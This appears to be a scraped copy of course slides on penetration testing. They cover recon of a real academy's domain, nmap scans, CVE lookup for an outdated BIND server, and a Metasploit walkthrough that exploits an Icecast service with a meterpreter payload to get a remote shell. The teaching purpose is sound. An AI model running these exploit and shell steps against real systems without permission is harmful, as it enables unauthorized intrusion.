Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Computer Science
  3. Information Security

Penetration Testing Part 2

advertisement 
Penetration Testing
Part 2
Review
 2-minute exercise:
 RECON ONLY
 Find 3x IP addresses at the U.S. Merchant Marine Academy
Google: “U.S. Merchant Marine Academy” to find URL
site:usmma.edu
site:usmma,edu –www.usmma.edu
nslookup blackboard.usmma.edu
nslookup ...
Review
 1-minute exercise:
 Use nmap to find all of the IP addresses in your group’s
network (10.10.1.0/24)
nmap –sn 10.10.1.*
Review
 1-minute exercise:
 Use nmap to find all of the open ports on 10.10.1.15.
 Looking at the open ports, what type of server is this?
nmap 10.10.1.15
DNS
Review
 2-minute exercise:
 Use nmap to find the version of the DNS server running on
10.10.1.15, port 53.
 ssh into 10.10.1.15 and run this command to verify:
/usr/sbin/named -ver
sudo nmap –sV 10.10.1.15
ISC BIND 9.8.1-P1
Phase 3 - Penetration
 The goal of this step is to obtain a shell or run code on a
remote machine.
 90% research
 10% attack
 Method:
1. Pick a host to exploit
2. Pick a running service on that host to exploit
3. Find out the version of the service
4. Find an exploit that works against that version
5. Run the exploit
6. Repeat as required
Metasploit
 Pentester tool/hacker tool
 Provides information about known security
vulnerabilities
 Three types of tools:
 exploits: code to overflow buffers/break into servers
 payloads: code to provide access to OS, often a shell
 auxiliary: misc functions, usually to retrieve information,
such as version numbers
CVE
 Common Vulnerabilities and Exposures (CVE)
 Reference system for known vulnerabilities
 Managed by MITRE Corporation
 Funded by DHS’s National Cyber Security Division
 http://cve.mitre.org
 Info is mirrored on multiple other sites, e.g.:
 http://cvedetails.com
CVE
 When in doubt, ask Google:...
 Google: cve isc bind 9.8.1-P1
 CVE-2012-1667
 CVE-2012-1033
 CVE-2012-5688
 CVE-2013-2266
 Three types of tools:
 exploits: code to overflow buffers/break into servers
 payloads: code to provide access to OS, often a shell
 auxiliary: misc functions, usually to retrieve information, such as
version numbers
Metasploit – find version of server
$ msfconsole
>
>
>
>
>
search ssh
use auxiliary/scanner/ssh/ssh_version
show options
set RHOSTS 14.29.4.105
exploit
 Similiar to: nmap –sV 14.29.4.105 –p22
Exploit walkthrough
 Target machine is 14.29.4.100
nmap –O 14.29.4.100
nmap –sV 14.29.4.100
Google: cve icecast
$
>
>
>
>
>
>
msfconsole
search icecast
use exploit/windows/http/icecast_header
show options
set RHOST 14.29.4.100
set PAYLOAD windows/meterpreter/bind_tcp
exploit
Meterpreter basics
 Meterpreter is a special shell injected as our payload
 Useful commands:
 getwd
# show the current working directory
 sysinfo
# print system info (name, OS, etc.)
 ipconfig # network info
 ps
# list all process
 upload <src> dest>
 download <src> <dest>
 shell
# Obtain a Windows shell (Win hosts only)
Related documents
Presentations
Presentations
Nmap - Personal Home Pages (at UEL)
Nmap - Personal Home Pages (at UEL)
Slides - PRA Lab
Slides - PRA Lab
Old MIDTERM EXAM for 154
Old MIDTERM EXAM for 154
SI110 Homework Alpha: ________ Name: ___________________ Page... Collaboration Policy: Default ...
SI110 Homework Alpha: ________ Name: ___________________ Page... Collaboration Policy: Default ...
The future of shell model techniques
The future of shell model techniques
CEH v10 Exam
CEH v10 Exam
Operating System.os
Operating System.os
Penetration Testing Guide
Penetration Testing Guide
Quick Start Guide To Penetration Testing With NMAP, OpenVAS And Metasploit (2019)
Quick Start Guide To Penetration Testing With NMAP, OpenVAS And Metasploit (2019)
Metasploit Pen Testing Cookbook
Metasploit Pen Testing Cookbook
Download
advertisement